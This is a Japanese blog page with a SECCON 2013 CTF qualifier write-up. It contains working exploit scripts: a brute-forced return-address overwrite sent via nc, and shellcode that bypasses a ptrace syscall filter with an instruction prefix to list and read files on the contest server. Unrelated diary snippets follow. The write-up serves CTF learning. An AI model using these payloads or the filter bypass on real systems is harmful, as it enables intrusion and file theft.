<!DOCTYPE html>
<html lang="ja">
  <head>
    
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="generator" content="Hugo 0.42.2 with theme Tranquilpeak 0.4.3-SNAPSHOT">
<meta name="author" content="Kazutoshi Noguchi">
<meta name="keywords" content="">
<meta name="description" content="SECCON オンライン予選にチーム0x0のメンバーとして参加しました。

3700点で7位でした。

bin500に時間をかけ過ぎた結果、練習問題とbin200しか解けなかった。

バイナリ問題以外も見ておけばよかった



 
  
  
  
  
    
  


  
    
  
    
  
    
  
   
    スコアの推移
  



">


<meta property="og:description" content="SECCON オンライン予選にチーム0x0のメンバーとして参加しました。

3700点で7位でした。

bin500に時間をかけ過ぎた結果、練習問題とbin200しか解けなかった。

バイナリ問題以外も見ておけばよかった



 
  
  
  
  
    
  


  
    
  
    
  
    
  
   
    スコアの推移
  



">
<meta property="og:type" content="article">
<meta property="og:title" content="SECCON 2013 オンライン予選 writeup">
<meta name="twitter:title" content="SECCON 2013 オンライン予選 writeup">
<meta property="og:url" content="https://ngkz.github.io/2014/01/seccon-2013-online-quals-writeup/">
<meta property="twitter:url" content="https://ngkz.github.io/2014/01/seccon-2013-online-quals-writeup/">
<meta property="og:site_name" content="ngkz.log">
<meta property="og:description" content="SECCON オンライン予選にチーム0x0のメンバーとして参加しました。

3700点で7位でした。

bin500に時間をかけ過ぎた結果、練習問題とbin200しか解けなかった。

バイナリ問題以外も見ておけばよかった



 
  
  
  
  
    
  


  
    
  
    
  
    
  
   
    スコアの推移
  



">
<meta name="twitter:description" content="SECCON オンライン予選にチーム0x0のメンバーとして参加しました。

3700点で7位でした。

bin500に時間をかけ過ぎた結果、練習問題とbin200しか解けなかった。

バイナリ問題以外も見ておけばよかった



 
  
  
  
  
    
  


  
    
  
    
  
    
  
   
    スコアの推移
  



">
<meta property="og:locale" content="ja">

  
    <meta property="article:published_time" content="2014-01-30T11:40:33">
  
  
    <meta property="article:modified_time" content="2014-01-30T11:40:33">
  
  
  
    
      <meta property="article:section" content="CTF">
    
      <meta property="article:section" content="writeup">
    
  
  
    
      <meta property="article:tag" content="SECCON">
    
  


<meta name="twitter:card" content="summary">











  <meta property="og:image" content="https://ngkz.github.io/mypicture.jpg">
  <meta property="twitter:image" content="https://ngkz.github.io/mypicture.jpg">


    <title>SECCON 2013 オンライン予選 writeup</title>

    <link rel="icon" href="https://ngkz.github.io/favicon.png">
    

    

    <link rel="canonical" href="https://ngkz.github.io/2014/01/seccon-2013-online-quals-writeup/">

    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha256-eZrrJcwDc/3uDhsdt61sL2oOBY362qM3lon1gyExkL0=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.css" integrity="sha256-vuXZ9LGmmwtjqFX1F+EKin1ThZMub58gKULUyf0qECk=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.css" integrity="sha256-SEa4XYAHihTcEP1f5gARTB2K26Uk8PsndQYHQC1f4jU=" crossorigin="anonymous" />
    
    
    <link rel="stylesheet" href="https://ngkz.github.io/css/style-nnm2spxvve8onlujjlegkkytaehyadd4ksxc1hyzzq9a2wvtrgbljqyulomn.min.css" />
    
    

    
      
    
    
  </head>

  <body>
    <div id="blog">
      <header id="header" data-behavior="1">
  <i id="btn-open-sidebar" class="fa fa-lg fa-bars"></i>
  <div class="header-title">
    <a class="header-title-link" href="https://ngkz.github.io/">ngkz.log</a>
  </div>
  
    
      <a class="header-right-picture "
         href="https://ngkz.github.io/page/profile/">
    
    
    
      
        <img class="header-picture" src="https://ngkz.github.io/mypicture.jpg" alt="プロフィール画像" />
      
    
    </a>
  
</header>

      <nav id="sidebar" data-behavior="1">
  <div class="sidebar-container">
    
      <div class="sidebar-profile">
        <a href="https://ngkz.github.io/page/profile/">
          <img class="sidebar-profile-picture" src="https://ngkz.github.io/mypicture.jpg" alt="プロフィール画像" />
        </a>
        <h4 class="sidebar-profile-name">Kazutoshi Noguchi</h4>
        
          <h5 class="sidebar-profile-bio">I&rsquo;m interested in InfoSec, Trip, Electronics, and DIY.</h5>
        
      </div>
    
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://ngkz.github.io/">
    
      <i class="sidebar-button-icon fa fa-lg fa-home"></i>
      
      <span class="sidebar-button-desc">ホーム</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://ngkz.github.io/categories">
    
      <i class="sidebar-button-icon fa fa-lg fa-bookmark"></i>
      
      <span class="sidebar-button-desc">カテゴリー</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://ngkz.github.io/tags">
    
      <i class="sidebar-button-icon fa fa-lg fa-tags"></i>
      
      <span class="sidebar-button-desc">タグ</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://ngkz.github.io/archives">
    
      <i class="sidebar-button-icon fa fa-lg fa-archive"></i>
      
      <span class="sidebar-button-desc">アーカイブ</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://ngkz.github.io/page/profile/">
    
      <i class="sidebar-button-icon fa fa-lg fa-question"></i>
      
      <span class="sidebar-button-desc">プロフィール</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://github.com/ngkz" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-github"></i>
      
      <span class="sidebar-button-desc">GitHub</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://ngkz.github.io/index.xml">
    
      <i class="sidebar-button-icon fa fa-lg fa-rss"></i>
      
      <span class="sidebar-button-desc">RSS</span>
    </a>
  </li>


    </ul>
  </div>
</nav>

      

      <div id="main" data-behavior="1"
        class="
               hasCoverMetaIn
               ">
        <article class="post" itemscope itemType="http://schema.org/BlogPosting">
          
          
            <div class="post-header main-content-wrap text-left">
  
    <h1 class="post-title" itemprop="headline">
      SECCON 2013 オンライン予選 writeup
    </h1>
  
  
  <div class="postShorten-meta post-meta">
    
      <time itemprop="datePublished" datetime="2014-01-30T11:40:33&#43;09:00">
        
  
  
  
  
    2014-01-30
  

      </time>
    
    
  
  
    <span>カテゴリー</span>
    
      <a class="category-link" href="https://ngkz.github.io/categories/ctf">CTF</a>, 
    
      <a class="category-link" href="https://ngkz.github.io/categories/writeup">writeup</a>
    
  

  </div>

</div>
          
          <div class="post-content markdown" itemprop="articleBody">
            <div class="main-content-wrap">
              <p>SECCON オンライン予選にチーム0x0のメンバーとして参加しました。</p>

<p>3700点で7位でした。</p>

<p>bin500に時間をかけ過ぎた結果、練習問題とbin200しか解けなかった。</p>

<p>バイナリ問題以外も見ておけばよかった</p>



 
  
  
  
  
    
  

<div class="figure " >
  
    <a class="fancybox" href="https://ngkz.github.io/assets/seccon-2013-online-quals-writeup/90b303d7e1e753a918811d598aa91f83.png" title="スコアの推移" data-fancybox-group="">
  
    <img class="fig-img" src="https://ngkz.github.io/assets/seccon-2013-online-quals-writeup/90b303d7e1e753a918811d598aa91f83.png"  alt="スコアの推移">
  
    </a>
  
   
    <span class="caption">スコアの推移</span>
  
</div>


<p></p>

<h2 id="exploit-me-bin200">exploit me (bin200)</h2>

<p>EBPの最後の1バイトを上書きできる。</p>

<p>0x8048e80にflagを表示する関数があるのでうまくそこにリターンさせればクリア</p>

<pre><code>import subprocess
 
for i in range(256):
    subprocess.call(r&quot;&quot;&quot;python -c &quot;import sys,struct; sys.stdout.write(struct.pack('&lt;L', 0x8048e80) * 20
 + '\x%02x')&quot; | nc exploitme.quals.seccon.jp 31337 -v&quot;&quot;&quot; % i, shell=True)
</code></pre>

<h2 id="hack-this-site-bin500">hack this site (bin500)</h2>

<p>プロセスのメモリダンプと長時間格闘した末、終了2時間前に任意のシステムコールを呼び出す方法に気づいたが、任意のファイルを読み込めるようになったところで時間切れになってしまった。</p>

<p>シェルコードをサーバーに投げると、forkした子プロセス内でptraceを使用してシングルステップ実行される。</p>

<p>シェルコードには以下の制限がある。</p>

<ul>
<li>最大64byte</li>
<li>int 0x80、sysenterは親プロセスでエミュレートされる。

<ul>
<li>stdoutへのwriteは40byteのバッファへの書き込みに置換され、実行後に出力される。</li>
<li>それ以外のシステムコールは無視される。</li>
<li>システムコール実行後には子プロセスがkillされる。</li>
<li>シェルコードが展開される1024byteのバッファの外を実行しようとするとkillされる。</li>
<li>INT3するとkillされる。</li>
</ul></li>
</ul>

<p>システムコールへの呼び出しを
命令の先頭が一致するかどうかでチェックしているので、int
0x80の前にプレフィックスをつけるとチェックをすり抜けて任意のシステムコールが実行できる。</p>

<p>あとはgetdirentsでファイルのリストを取得</p>

<pre><code>#!/usr/bin/python
import socket
import subprocess
import pack
import re
 
def execute(asm, apd):
    fasm = open(&quot;/tmp/bin.asm&quot;, &quot;w&quot;)
    fasm.write(asm)
    fasm.close()
    subprocess.check_call(&quot;nasm /tmp/bin.asm&quot;, shell=True)
    #s = socket.create_connection((&quot;133.242.20.195&quot;, 80))
    s = socket.create_connection((&quot;133.242.18.174&quot;, 80))
    bin_ = open(&quot;/tmp/bin&quot;, &quot;r&quot;)
    shellcode = bin_.read() + apd
    if len(shellcode) &gt; 64:
        print &quot;beep&quot;
        print len(shellcode)
    url = &quot;GET /cgi-bin/99.cgi?&quot;
    for ch in shellcode:
        url += (&quot;%%%02x&quot; % ord(ch))
    s.send(url + &quot;\r\n&quot;)
    result = &quot;&quot;
    while True:
        a = s.recv(4096)
        result += a
        if len(a) &lt;= 0:
            break
    s.close()
    return result
 
shellcode_ls = &quot;&quot;&quot;
bits 32
org 0
lea ebx,[eax+A + 1] ;path
mov eax,0x5 ;open
mov ecx, 0x10000 ;O_DIRECTORY
cs int 0x80
 
mov ebx, eax
mov eax, 141 ;getdents
mov ecx, esp ;buf
mov edx, 0x1000 ;buf size
cs int 0x80
 
lea ecx, [esp+10] ;buf
mov edx,0x1000 ;size
mov eax,0x4 ;write
mov ebx,0x1 ;stdout
int 0x80
 
A:
db &quot;.&quot;, 0 ;path
&quot;&quot;&quot;
 
print execute(shellcode_ls, &quot;&quot;)
</code></pre>

<p>lseekとreadでpwd.zipを読み込む。</p>

<pre><code>wfile = open(&quot;pwd.zip&quot;, &quot;w&quot;)
readed = 0
readsize = 0x10400
while readed &lt; readsize:
    print readed
    shellcode_cat = &quot;&quot;&quot;
    bits 32
    org 0
    lea ebx,[eax + A + 1] ;eax = address of shellcode
    xor eax,eax
    mov al,0x5 ;open
    xor ecx,ecx
    cs int 0x80
 
    mov ebx, eax
    mov ecx, 0x{0:x}
    xor edx, edx ;SEEK_SET
    xor eax,eax
    mov al, 19 ;lseek
    cs int 0x80
 
    xor eax,eax
    mov al,0x3 ;read
    mov edi,esp
    mov ecx,edi
    mov edx,0x100000
    cs int 0x80
 
    shr eax, 2
    mov esi, esp
    mov ecx, eax
    rep lodsd
 
    A:
    db &quot;pwd.zip&quot;, 0
    &quot;&quot;&quot;.format(readed)
 
    result = execute(shellcode_cat, &quot;&quot;)
    m = re.findall(r&quot;&quot;&quot;eip: f3 ad \( rep lodsd \)
 
eax=(\w+), ecx=\w+, edx=\w+, ebx=\w+
esi=\w+, edi=\w+, esp=\w+, ebp=\w+
eip=\w+, eflags=\w+&quot;&quot;&quot;, result, re.M)
    buf = &quot;&quot;
    for value in m:
        buf += pack.pl32(int(value, 16))
        readed += 4
    wfile.write(buf)
 
wfile.close()
</code></pre>

<p>pwd.zipを解凍すると comb,xxx.bin,hint.txtが出てくる。</p>

<p>$ nkf hint.txt</p>

<pre><code>pwd.bmpとpwd.pngは
フォーマットが違うだけで同じ画像

$ ./comb pwd.bmp pwd.png &gt; xxx.bin

このように実行された
</code></pre>

<p>combは以下のような動作をするプログラム。</p>

<pre><code>char *file1_buf;
int file1_size;
char *file2_buf;
int file2_size;
 
read_whole_file(argv[1], &amp;file1_buf, &amp;file1_size);
read_whole_file(argv[2], &amp;file2_buf, &amp;file2_size);
srand(time(0));
 
do {
    if (rand() % (file1_size + file2_size) &gt;= file1_size) {
        fwrite(file2_buf, 1, 16, stdout);
        file2_buf += 16;
        file2_size -= 16;
    } else {
        fwrite(file1_buf, 1, 16, stdout);
        file1_buf += 16;
        file1_size -= 16;
    }
 
    if (file1_size &lt; 0) file1_size = 0;
    if (file2_size &lt; 0) file2_size = 0;
} while(file1_size + file2_size &gt; 0);
</code></pre>

<p></p>

<p>xxx.binの更新時間から乱数のseedを、BMPのヘッダからpwd.bmpのファイルサイズを、PNGのフッタとpwd.bmpのファイルサイズから
pwd.pngのファイルサイズを復元できる。 </p>

<pre><code>#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
 
void read_whole_file(const char *filename, char **bufptr, size_t *size) {
    FILE *a = fopen(filename, &quot;rb&quot;);
    if (!a) abort();
    fseek(a, 0, SEEK_END);
    *size = ftell(a);
    *bufptr = (char *)malloc(*size);
    fseek(a, 0, SEEK_SET);
    fread(*bufptr, 1, *size, a);
    fclose(a);
}
 
int main() {
    char *buf;
    size_t size;
 
    read_whole_file(&quot;xxx.bin&quot;, &amp;buf, &amp;size);
 
    FILE *bmp = fopen(&quot;pwd.bmp&quot;, &quot;wb&quot;);
    FILE *png = fopen(&quot;pwd.png&quot;, &quot;wb&quot;);
    int bmp_size = 91150;   //bmp size from header
    int png_size = size - ((bmp_size + 15) &amp; ~15) - 4;
    srand(1387271182 - 1); //mtime of xxx.bin
                           //zipのタイムスタンプの精度は2秒
    for (int i = 0; i &lt; size; i += 16) {
        if ((rand() % (bmp_size + png_size)) &gt;= bmp_size) {
            fwrite(buf + i, 1, 16, png);
            png_size -= 16;
        } else {
            fwrite(buf + i, 1, 16, bmp);
            bmp_size -= 16;
        }
 
        if (bmp_size &lt; 0) bmp_size = 0;
        if (png_size &lt; 0) png_size = 0;
    }
    fclose(bmp);
    fclose(png);
 
    return 0;
}
</code></pre>

<p>$ xdg-open pwd.png</p>

<p>

 
  
  
  
  
    
  

<div class="figure " >
  
    <a class="fancybox" href="https://ngkz.github.io/assets/seccon-2013-online-quals-writeup/xxx.png" title="Password: LAstEsCaPE" data-fancybox-group="">
  
    <img class="fig-img" src="https://ngkz.github.io/assets/seccon-2013-online-quals-writeup/xxx.png"  alt="Password: LAstEsCaPE">
  
    </a>
  
   
    <span class="caption">Password: LAstEsCaPE</span>
  
</div>
</p>
              
            </div>
          </div>
          <div id="post-footer" class="post-footer main-content-wrap">
            
              
                
                
                  <div class="post-footer-tags">
                    <span class="text-color-light text-small">タグ</span><br/>
                    
  <a class="tag tag--primary tag--small" href="https://ngkz.github.io/tags/seccon/">SECCON</a>

                  </div>
                
              
            
            <div class="post-actions-wrap">
  
      <nav >
        <ul class="post-actions post-action-nav">
          
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://ngkz.github.io/2014/03/seccon-2013-finals-writeup/" data-tooltip="SECCON 二連覇しました。(SECCON 2013 決勝 writeup)">
              
                  <i class="fa fa-angle-left"></i>
                  <span class="hide-xs hide-sm text-small icon-ml">次</span>
                </a>
            </li>
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://ngkz.github.io/2014/01/30c3ctf-writeup/" data-tooltip="30c3 ctf writeup">
              
                  <span class="hide-xs hide-sm text-small icon-mr">前</span>
                  <i class="fa fa-angle-right"></i>
                </a>
            </li>
          
        </ul>
      </nav>
    <ul class="post-actions post-action-share" >
      
        <li class="post-action hide-lg hide-md hide-sm">
          <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
            <i class="fa fa-share-alt"></i>
          </a>
        </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https://ngkz.github.io/2014/01/seccon-2013-online-quals-writeup/">
              <i class="fa fa-facebook-official"></i>
            </a>
          </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https://ngkz.github.io/2014/01/seccon-2013-online-quals-writeup/">
              <i class="fa fa-twitter"></i>
            </a>
          </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://plus.google.com/share?url=https://ngkz.github.io/2014/01/seccon-2013-online-quals-writeup/">
              <i class="fa fa-google-plus"></i>
            </a>
          </li>
        
      
      
        <li class="post-action">
          <a class="post-action-btn btn btn--default" href="#disqus_thread">
            <i class="fa fa-comment-o"></i>
          </a>
        </li>
      
      <li class="post-action">
        
          <a class="post-action-btn btn btn--default" href="#">
        
          <i class="fa fa-list"></i>
        </a>
      </li>
    </ul>
  
</div>

            
              
                <div id="disqus_thread">
  <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>
              
            
          </div>
        </article>
        <footer id="footer" class="main-content-wrap">
  <span class="copyrights">
      <a rel="license" href="http://creativecommons.org/licenses/by-sa/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-sa/4.0/80x15.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" property="dct:title">ngkz.log</span> by <a xmlns:cc="http://creativecommons.org/ns#" href="https://ngkz.github.io/" property="cc:attributionName" rel="cc:attributionURL">Kazutoshi Noguchi</a> is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-sa/4.0/">Creative Commons Attribution-ShareAlike 4.0 International License</a>.
  </span>
</footer>

      </div>
      <div id="bottom-bar" class="post-bottom-bar" data-behavior="1">
        <div class="post-actions-wrap">
  
      <nav >
        <ul class="post-actions post-action-nav">
          
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://ngkz.github.io/2014/03/seccon-2013-finals-writeup/" data-tooltip="SECCON 二連覇しました。(SECCON 2013 決勝 writeup)">
              
                  <i class="fa fa-angle-left"></i>
                  <span class="hide-xs hide-sm text-small icon-ml">次</span>
                </a>
            </li>
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://ngkz.github.io/2014/01/30c3ctf-writeup/" data-tooltip="30c3 ctf writeup">
              
                  <span class="hide-xs hide-sm text-small icon-mr">前</span>
                  <i class="fa fa-angle-right"></i>
                </a>
            </li>
          
        </ul>
      </nav>
    <ul class="post-actions post-action-share" >
      
        <li class="post-action hide-lg hide-md hide-sm">
          <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
            <i class="fa fa-share-alt"></i>
          </a>
        </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https://ngkz.github.io/2014/01/seccon-2013-online-quals-writeup/">
              <i class="fa fa-facebook-official"></i>
            </a>
          </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https://ngkz.github.io/2014/01/seccon-2013-online-quals-writeup/">
              <i class="fa fa-twitter"></i>
            </a>
          </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://plus.google.com/share?url=https://ngkz.github.io/2014/01/seccon-2013-online-quals-writeup/">
              <i class="fa fa-google-plus"></i>
            </a>
          </li>
        
      
      
        <li class="post-action">
          <a class="post-action-btn btn btn--default" href="#disqus_thread">
            <i class="fa fa-comment-o"></i>
          </a>
        </li>
      
      <li class="post-action">
        
          <a class="post-action-btn btn btn--default" href="#">
        
          <i class="fa fa-list"></i>
        </a>
      </li>
    </ul>
  
</div>

      </div>
      <div id="share-options-bar" class="share-options-bar" data-behavior="1">
  <i id="btn-close-shareoptions" class="fa fa-close"></i>
  <ul class="share-options">
    
      <li class="share-option">
        <a class="share-option-btn" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fngkz.github.io%2F2014%2F01%2Fseccon-2013-online-quals-writeup%2F">
          <i class="fa fa-facebook-official"></i><span>Facebookで共有</span>
        </a>
      </li>
    
      <li class="share-option">
        <a class="share-option-btn" target="new" href="https://twitter.com/intent/tweet?text=https%3A%2F%2Fngkz.github.io%2F2014%2F01%2Fseccon-2013-online-quals-writeup%2F">
          <i class="fa fa-twitter"></i><span>Twitterで共有</span>
        </a>
      </li>
    
      <li class="share-option">
        <a class="share-option-btn" target="new" href="https://plus.google.com/share?url=https%3A%2F%2Fngkz.github.io%2F2014%2F01%2Fseccon-2013-online-quals-writeup%2F">
          <i class="fa fa-google-plus"></i><span>Google&#43;で共有</span>
        </a>
      </li>
    
  </ul>
</div>
<div id="share-options-mask" class="share-options-mask"></div>
    </div>
    
    <div id="about">
  <div id="about-card">
    <div id="about-btn-close">
      <i class="fa fa-remove"></i>
    </div>
    
      <img id="about-card-picture" src="https://ngkz.github.io/mypicture.jpg" alt="プロフィール画像" />
    
    <h4 id="about-card-name">Kazutoshi Noguchi</h4>
    
      <div id="about-card-bio">I&rsquo;m interested in InfoSec, Trip, Electronics, and DIY.</div>
    
    
      <div id="about-card-job">
        <i class="fa fa-briefcase"></i>
        <br/>
        System integrator
      </div>
    
    
      <div id="about-card-location">
        <i class="fa fa-map-marker"></i>
        <br/>
        Japan
      </div>
    
  </div>
</div>

    <div id="algolia-search-modal" class="modal-container">
  <div class="modal">
    <div class="modal-header">
      <span class="close-button"><i class="fa fa-close"></i></span>
      <a href="https://algolia.com" target="_blank" rel="noopener" class="searchby-algolia text-color-light link-unstyled">
        <span class="searchby-algolia-text text-color-light text-small">by</span>
        <img class="searchby-algolia-logo" src="https://www.algolia.com/static_assets/images/press/downloads/algolia-light.svg">
      </a>
      <i class="search-icon fa fa-search"></i>
      <form id="algolia-search-form">
        <input type="text" id="algolia-search-input" name="search"
          class="form-control input--large search-input" placeholder="検索" />
      </form>
    </div>
    <div class="modal-body">
      <div class="no-result text-color-light text-center"></div>
      <div class="results">
        
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://ngkz.github.io/2019/03/diary-20190327/">
                <h3 class="media-heading">日記 2019/03/27(水)</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="linux-from-scratch">Linux from Scratch</h2>

<ul>
<li>GCCのビルド中

<ul>
<li><code>--enable-default-pie</code>と<code>--enable-default-ssp</code>が原因で壊れるテストの修正中</li>
</ul></li>
</ul>

<h2 id="筋トレ">筋トレ</h2>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://ngkz.github.io/2019/03/diary-20190326/">
                <h3 class="media-heading">日記 2019/03/26(火)</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="linux-from-scratch">Linux from Scratch</h2>

<ul>
<li>GCCのビルド中

<ul>
<li>別のマシンでビルドしてもテストが通らなかった。</li>
<li>テストコードとGCCが生成したバイナリを調べたり、GCCのメーリングリストとバグトラッカーで解決策を探したりしてみたら、何個かのテストについては解決策を見つけた。一部のテストが<code>--enable-default-pie</code>や<code>--enable-default-ssp</code>でビルドしたGCCに対応していないらしい。</li>
</ul></li>
</ul>

<h2 id="その他">その他</h2>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://ngkz.github.io/2019/03/diary-20190325/">
                <h3 class="media-heading">日記 2019/03/25(月)</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="linux-from-scratch">Linux from Scratch</h2>

<ul>
<li>ビルド手順に何箇所か問題があったので修正</li>
<li>進捗ほとんどなし</li>
</ul>

<h2 id="筋トレ">筋トレ</h2>

<ul>
<li>THE プレワークアウトを筋トレ40分前に1スクープ摂取</li>
<li>HMBをトレーニング1.5時間前, 就寝前に1.5g摂取</li>
<li>前日の睡眠 6:17 (1:27→7:50）</li>
</ul>

<p><strong>下半身+腹筋</strong></p>

<table>
<thead>
<tr>
<th>種目</th>
<th>重量&amp;目標回数</th>
<th>回数</th>
<th>備考</th>
</tr>
</thead>

<tbody>
<tr>
<td>ピストルスクワット</td>
<td>自重,ベンチでチーティング</td>
<td>左5 右3 左9 右15 左13 右19 左7 右8 左7 右5</td>
<td>やり方覚えながら 時間切れ</td>
</tr>
</tbody>
</table>

<h2 id="その他">その他</h2>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://ngkz.github.io/2019/03/diary-20190324/">
                <h3 class="media-heading">日記 2019/03/24(日)</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="linux-from-scratch">Linux from Scratch</h2>

<ul>
<li>GCCのテストが通らない

<ul>
<li>フラグを全部削除してみたり、フラグを全部削除+PIE無効にしてみてもテストが通らない。</li>
<li><a href="http://www.linuxfromscratch.org/lfs/build-logs/8.3/i7-5820K/test-logs/087-gcc-8.2.0">LFS著者のビルドログでは全テストが通っている</a>ので、ビルド手順を間違ったか、ツールチェーンのカスタマイズに問題があるかもしれない</li>
<li>ビルド+テスト 1周に2-3時間はかかるのでかなりつらい</li>
</ul></li>
</ul>

<h2 id="筋トレ">筋トレ</h2>

<ul>
<li>休憩日</li>
<li>ソルティッドキャラメル味のインパクトホエイを使いきったので、ノンフレーバーのホエイプロテインに CAFE LATORY 抹茶と甘味料を入れて飲んでみた。カゼインと違ってプロテイン自体にほとんど味がないので1本で完全に抹茶味になった。おいしかった。

<ul>
<li>ソルティッドキャラメル味とラテ味は不快な甘みがあって途中から飲むのがつらくなった。マイプロテインの甘い系のフレーバーは自分の好みではないようだ。</li>
</ul></li>
</ul>

<h2 id="その他">その他</h2>

<ul>
<li>カーメイトのシガーソケット分配器の接点が凹んでしまっていたので分解して直した。なぜかケースの片側が発熱するパイロットランプにホットボンドで固定されていた。別の箇所でもう片側のケースにネジ止めされているから強度の問題はないんだけど、こんなものを付けるくらいなら強く押すと凹む接点をどうにかしてほしい</li>
<li>昨日もらったポータブル冷蔵庫のファンフィルターが汚れていたので分解清掃した。経年劣化で中のガムテープらしきものが全部剥がれてしまっていたので貼り替えた。</li>
</ul>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://ngkz.github.io/2019/03/diary-20190323/">
                <h3 class="media-heading">日記 2019/03/23(土)</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="linux-from-scratch">Linux from Scratch</h2>

<ul>
<li>GCCのテストが通らない

<ul>
<li>テスト時にHardeningフラグとPIEを無効にしてみたり、フラグをいろいろと変えてコンパイラをビルドしてみたりしてみたがダメだった</li>
</ul></li>
</ul>

<h2 id="冷蔵庫">冷蔵庫</h2>

<ul>
<li>父から使われていない車用ポータブル冷蔵庫をもらった。</li>
</ul>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://ngkz.github.io/2019/03/diary-20190322/">
                <h3 class="media-heading">日記 2019/03/22(金)</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="linux-from-scratch">Linux from Scratch</h2>

<ul>
<li>昨日ビルドしたbinutilsのバイナリがなぜか非PIEになっていた。 ログを採って調べてみたら、テスト前にHardeningフラグを取り除いてPIEを無効にしたときにMakefileのタイムスタンプが変わったのが原因で、バイナリがPIE無効で再リンクされてしまていたことが分かった。<br />
<a href="https://github.com/ngkz/my-lfs-setup/commit/84551e209d17e9220912b057dc1c56d1814e353e">Makefileに細工するときにタイムスタンプが変わらないようにしたら解決した</a>。</li>
<li>MPFR,MPC,Shadowをインストールした。</li>
<li>GCCをビルドしている途中

<ul>
<li>nobodyユーザーに切り替えるとなぜか モードが<code>666</code>の<code>/dev/tty</code>が読めなくなった。<code>/</code>の所有者が<code>1000</code>でモードが<code>700</code>になっていたのが原因だった。</li>
<li>ほぼ全てのテストが失敗するので原因を調べてみたら、<code>/dev/pts</code>のマウントオプションが間違っていて<code>/dev/pts/ptmx</code>のモードが<code>000</code>になっていたのが原因だった。マウントオプションに<code>newinstance,ptmxmode=0666</code>を加えて解決。</li>
<li><code>/dev/pts/ptmx</code>を直したら大体のテストは通るようになったが、まだ何十ものテストが失敗している。テストに数時間かかるのでデバッグにかなり手間がかかりそう。</li>
</ul></li>
</ul>

<h2 id="筋トレ">筋トレ</h2>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://ngkz.github.io/2019/03/diary-20190321/">
                <h3 class="media-heading">日記 2019/03/21(木)</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
